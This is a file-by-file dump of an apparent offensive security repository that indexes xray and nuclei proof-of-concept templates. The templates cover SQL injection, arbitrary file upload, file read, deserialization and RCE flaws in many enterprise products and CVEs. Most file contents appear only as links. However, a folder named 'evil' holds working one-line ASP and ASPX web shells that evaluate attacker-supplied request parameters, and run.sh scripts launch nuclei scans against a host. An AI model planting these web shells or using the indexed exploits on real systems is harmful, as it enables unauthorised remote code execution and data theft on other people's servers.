https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/海康威视-综合安防管理平台 keepAlive 存在 FastJson 反序列化/deserialization.yml -------------------------------------------------------------------------------- /2024-7-xray/满客宝智慧食堂系统 selectUserByOrgId 未授权访问漏洞/unauth.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/满客宝智慧食堂系统 selectUserByOrgId 未授权访问漏洞/unauth.yml -------------------------------------------------------------------------------- /2024-7-xray/瑞友天翼应用虚拟化系统 appsave SQL注入漏洞/sql_injection.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/瑞友天翼应用虚拟化系统 appsave SQL注入漏洞/sql_injection.yml -------------------------------------------------------------------------------- /2024-7-xray/用友时空KSOA PreviewKPQT SQL注入漏洞/sql_injection.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/用友时空KSOA PreviewKPQT SQL注入漏洞/sql_injection.yml -------------------------------------------------------------------------------- /2024-7-xray/百易云资产管理运营系统 comfileup.php 任意文件上传漏洞/file_upload.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/百易云资产管理运营系统 comfileup.php 任意文件上传漏洞/file_upload.yml -------------------------------------------------------------------------------- /2024-7-xray/科讯校园一卡通管理系统 dormitoryHealthRanking SQL注入漏洞/sql_injection.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/科讯校园一卡通管理系统 dormitoryHealthRanking SQL注入漏洞/sql_injection.yml -------------------------------------------------------------------------------- /2024-7-xray/科讯校园一卡通管理系统 get_kq_tj_today SQL注入漏洞/sql_injection.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/科讯校园一卡通管理系统 get_kq_tj_today SQL注入漏洞/sql_injection.yml -------------------------------------------------------------------------------- /2024-7-xray/管理易 FileUpload 任意文件上传漏洞/fileupload.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/管理易 FileUpload 任意文件上传漏洞/fileupload.yml -------------------------------------------------------------------------------- /2024-7-xray/联软安渡 UniNXG 安全数据交换系统 任意文件读取漏洞/readfile.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/联软安渡 UniNXG 安全数据交换系统 任意文件读取漏洞/readfile.yml -------------------------------------------------------------------------------- /2024-7-xray/脸爱云一脸通智慧管理平台 downloads.aspx 信息泄露漏洞/leak.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/脸爱云一脸通智慧管理平台 downloads.aspx 信息泄露漏洞/leak.yml -------------------------------------------------------------------------------- /2024-7-xray/致远OA 前台fileUpload.do绕过文件上传漏洞/file_upload.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/致远OA 前台fileUpload.do绕过文件上传漏洞/file_upload.yml -------------------------------------------------------------------------------- /2024-7-xray/金慧综合管理信息系统 LoginBegin.aspx SQL注入漏洞/sql_injection.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/金慧综合管理信息系统 LoginBegin.aspx SQL注入漏洞/sql_injection.yml -------------------------------------------------------------------------------- /2024-7-xray/银达汇智智慧综合管理平台ERP filehandle.aspx 任意文件读取漏洞/readfile.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-7-xray/银达汇智智慧综合管理平台ERP filehandle.aspx 任意文件读取漏洞/readfile.yml -------------------------------------------------------------------------------- /2024-8-xray/Apache OFBiz 授权不当致远程代码执行漏洞(CVE-2024-38856)/rce.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/Apache OFBiz 授权不当致远程代码执行漏洞(CVE-2024-38856)/rce.yml -------------------------------------------------------------------------------- /2024-8-xray/CMSV6车辆监控平台系统中存在弱密码漏洞/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/CMSV6车辆监控平台系统中存在弱密码漏洞/image.png -------------------------------------------------------------------------------- /2024-8-xray/CMSV6车辆监控平台系统中存在弱密码漏洞/weak.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/CMSV6车辆监控平台系统中存在弱密码漏洞/weak.yaml -------------------------------------------------------------------------------- /2024-8-xray/Calibre export任意文件读取漏洞/fileread.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/Calibre export任意文件读取漏洞/fileread.yml -------------------------------------------------------------------------------- /2024-8-xray/H3C iMC智能管理中心 多反序列化导致RCE漏洞/deserialization.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/H3C iMC智能管理中心 多反序列化导致RCE漏洞/deserialization.yml -------------------------------------------------------------------------------- /2024-8-xray/Sonatype Nexus Repository 路径穿越漏洞(CVE-2024-4956)/fiileread.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/Sonatype Nexus Repository 路径穿越漏洞(CVE-2024-4956)/fiileread.yml -------------------------------------------------------------------------------- /2024-8-xray/万户OA TeleConferenceService XXE漏洞/xxe.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/万户OA TeleConferenceService XXE漏洞/xxe.yml -------------------------------------------------------------------------------- /2024-8-xray/云时空社会化商业ERP系统 user-online 身份认证绕过漏洞/unauth.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/云时空社会化商业ERP系统 user-online 身份认证绕过漏洞/unauth.yml -------------------------------------------------------------------------------- /2024-8-xray/亿赛通电子文档安全管理系统 CDGAuthoriseTempletService1 SQL注入漏洞/sqli.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/亿赛通电子文档安全管理系统 CDGAuthoriseTempletService1 SQL注入漏洞/sqli.yml -------------------------------------------------------------------------------- /2024-8-xray/同享TXEHR V15人力管理管理平台strCardNo存在SQL注入漏洞/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/同享TXEHR V15人力管理管理平台strCardNo存在SQL注入漏洞/image.png -------------------------------------------------------------------------------- /2024-8-xray/同享TXEHR V15人力管理管理平台strCardNo存在SQL注入漏洞/sqli.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/同享TXEHR V15人力管理管理平台strCardNo存在SQL注入漏洞/sqli.yml -------------------------------------------------------------------------------- /2024-8-xray/契约锁电子签章平台 param-edits 远程代码执行漏洞/rce.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/契约锁电子签章平台 param-edits 远程代码执行漏洞/rce.yml -------------------------------------------------------------------------------- /2024-8-xray/安美数字酒店宽带运营系统 weather.php 任意文件读取漏洞/fileread.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/安美数字酒店宽带运营系统 weather.php 任意文件读取漏洞/fileread.yml -------------------------------------------------------------------------------- /2024-8-xray/微厦在线学习平台 OrganSetup 任意文件上传漏洞/file-upload.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/微厦在线学习平台 OrganSetup 任意文件上传漏洞/file-upload.yml -------------------------------------------------------------------------------- /2024-8-xray/泛微 E-Office 10 schema_mysql 敏感信息泄露漏洞/leak.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/泛微 E-Office 10 schema_mysql 敏感信息泄露漏洞/leak.yml -------------------------------------------------------------------------------- /2024-8-xray/用友NC complainjudge SQL注入漏洞/sqli.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/用友NC complainjudge SQL注入漏洞/sqli.yml -------------------------------------------------------------------------------- /2024-8-xray/用友U8 Cloud BusinessRefAction SQL注入漏洞/sqli.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/用友U8 Cloud BusinessRefAction SQL注入漏洞/sqli.yml -------------------------------------------------------------------------------- /2024-8-xray/金和 OA GetSqlData.aspx rce漏洞/rce.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/金和 OA GetSqlData.aspx rce漏洞/rce.yml -------------------------------------------------------------------------------- /2024-8-xray/金斗云 HKMP智慧商业软件 download 任意文件读取漏洞/fileread.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/金斗云 HKMP智慧商业软件 download 任意文件读取漏洞/fileread.yml -------------------------------------------------------------------------------- /2024-8-xray/金斗云HKMP智慧商业软件 queryPrintTemplate SQL注入漏洞/sqli.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/金斗云HKMP智慧商业软件 queryPrintTemplate SQL注入漏洞/sqli.yml -------------------------------------------------------------------------------- /2024-8-xray/银达汇智智慧校园(安校易)管理系统 ReceiveClassVideo 任意文件上传漏洞/file-upload.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-8-xray/银达汇智智慧校园(安校易)管理系统 ReceiveClassVideo 任意文件上传漏洞/file-upload.yml -------------------------------------------------------------------------------- /POC_not/CVE-2023-46226 Apache IotDB UDF代码执行漏洞/run.sh: -------------------------------------------------------------------------------- 1 | nuclei -u 192.168.136.130:8080 -t ./CVE-2024-23334.yaml 2 | -------------------------------------------------------------------------------- /POC_not/CVE-2023-46226 Apache IotDB UDF代码执行漏洞/xxx.yaml: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /POC_not/CVE-2023-46226 Apache IotDB UDF代码执行漏洞/复现.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/POC_not/CVE-2023-46226 Apache IotDB UDF代码执行漏洞/复现.md -------------------------------------------------------------------------------- /POC_not/CVE-2024-21410 Microsoft Exchange Server 权限提升漏洞/run.sh: -------------------------------------------------------------------------------- 1 | nuclei -u 192.168.136.130:8080 -t ./CVE-2024-23334.yaml 2 | -------------------------------------------------------------------------------- /POC_not/CVE-2024-21410 Microsoft Exchange Server 权限提升漏洞/xxx.yaml: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /POC_not/CVE-2024-21410 Microsoft Exchange Server 权限提升漏洞/复现.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /POC_not/CVE-2024-21413 Microsoft Outlook 远程命令执行漏洞/run.sh: -------------------------------------------------------------------------------- 1 | nuclei -u 192.168.136.130:8080 -t ./CVE-2024-23334.yaml 2 | -------------------------------------------------------------------------------- /POC_not/CVE-2024-21413 Microsoft Outlook 远程命令执行漏洞/xxx.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/POC_not/CVE-2024-21413 Microsoft Outlook 远程命令执行漏洞/xxx.yaml -------------------------------------------------------------------------------- /POC_not/CVE-2024-21413 Microsoft Outlook 远程命令执行漏洞/复现.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /POC_not/Palo Alto Networks PAN-OS GlobalProtect命令注入漏洞(CVE-2024-3400)/CVE-2024-3400.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/POC_not/Palo Alto Networks PAN-OS GlobalProtect命令注入漏洞(CVE-2024-3400)/CVE-2024-3400.yaml -------------------------------------------------------------------------------- /POC_not/T/run.sh: -------------------------------------------------------------------------------- 1 | nuclei -u 192.168.136.130:8080 -t ./CVE-2024-23334.yaml 2 | -------------------------------------------------------------------------------- /POC_not/T/xxx.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/POC_not/T/xxx.yaml -------------------------------------------------------------------------------- /POC_not/T/复现.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/README.md -------------------------------------------------------------------------------- /help-scripts/batch_extract_url.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/help-scripts/batch_extract_url.py -------------------------------------------------------------------------------- /help-scripts/batch_query_ip.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/help-scripts/batch_query_ip.py -------------------------------------------------------------------------------- /help-scripts/evil/1.asp: -------------------------------------------------------------------------------- 1 | <%eval request ("pass")%> -------------------------------------------------------------------------------- /help-scripts/evil/1.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> -------------------------------------------------------------------------------- /help-scripts/evil/1.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/help-scripts/evil/1.jsp -------------------------------------------------------------------------------- /help-scripts/evil/1.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /help-scripts/evil/rce.asmx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/help-scripts/evil/rce.asmx -------------------------------------------------------------------------------- /help-scripts/evil/rce.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/help-scripts/evil/rce.aspx -------------------------------------------------------------------------------- /help-scripts/evil/rce.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/help-scripts/evil/rce.jsp -------------------------------------------------------------------------------- /help-scripts/evil/tupianma.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/help-scripts/evil/tupianma.php -------------------------------------------------------------------------------- /help-scripts/icon_hash_fofa.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/help-scripts/icon_hash_fofa.py -------------------------------------------------------------------------------- /help-scripts/test_vul_server.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/help-scripts/test_vul_server.py -------------------------------------------------------------------------------- /help-scripts/提取子目录.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/help-scripts/提取子目录.py -------------------------------------------------------------------------------- /nuclei_templates/deserialization.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/nuclei_templates/deserialization.yaml -------------------------------------------------------------------------------- /nuclei_templates/file-upload.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/nuclei_templates/file-upload.yaml -------------------------------------------------------------------------------- /nuclei_templates/local-file-include.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/nuclei_templates/local-file-include.yaml -------------------------------------------------------------------------------- /nuclei_templates/sqli.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/nuclei_templates/sqli.yaml -------------------------------------------------------------------------------- /nuclei_templates/xxe.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/nuclei_templates/xxe.yaml -------------------------------------------------------------------------------- /xray_templates/xray-file-read-webconfig.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/xray_templates/xray-file-read-webconfig.yml -------------------------------------------------------------------------------- /xray_templates/xray-file-read.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/xray_templates/xray-file-read.yml -------------------------------------------------------------------------------- /xray_templates/xray-file-upload-aspx.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/xray_templates/xray-file-upload-aspx.yml -------------------------------------------------------------------------------- /xray_templates/xray-file-upload-jsp.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/xray_templates/xray-file-upload-jsp.yml -------------------------------------------------------------------------------- /xray_templates/xray-php-file-upload.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/xray_templates/xray-php-file-upload.yml -------------------------------------------------------------------------------- /xray_templates/xray-rce-oob.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/xray_templates/xray-rce-oob.yml -------------------------------------------------------------------------------- /xray_templates/xray-rce.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/xray_templates/xray-rce.yml -------------------------------------------------------------------------------- /xray_templates/xray-sqli-get.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/xray_templates/xray-sqli-get.yml -------------------------------------------------------------------------------- /xray_templates/xray-sqli-mssql-error.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/xray_templates/xray-sqli-mssql-error.yml -------------------------------------------------------------------------------- /xray_templates/xray-sqli-mysql-error.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/xray_templates/xray-sqli-mysql-error.yml -------------------------------------------------------------------------------- /xray_templates/xray-sqli-post.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/xray_templates/xray-sqli-post.yml -------------------------------------------------------------------------------- /xray_templates/xray-unauth.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/xray_templates/xray-unauth.yml -------------------------------------------------------------------------------- /xray_templates/xray-unserize-rce.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/xray_templates/xray-unserize-rce.yml -------------------------------------------------------------------------------- /xray_templates/xray-weak-passwd.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/xray_templates/xray-weak-passwd.yml -------------------------------------------------------------------------------- /xray_templates/xray-xxe.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/xray_templates/xray-xxe.yml --------------------------------------------------------------------------------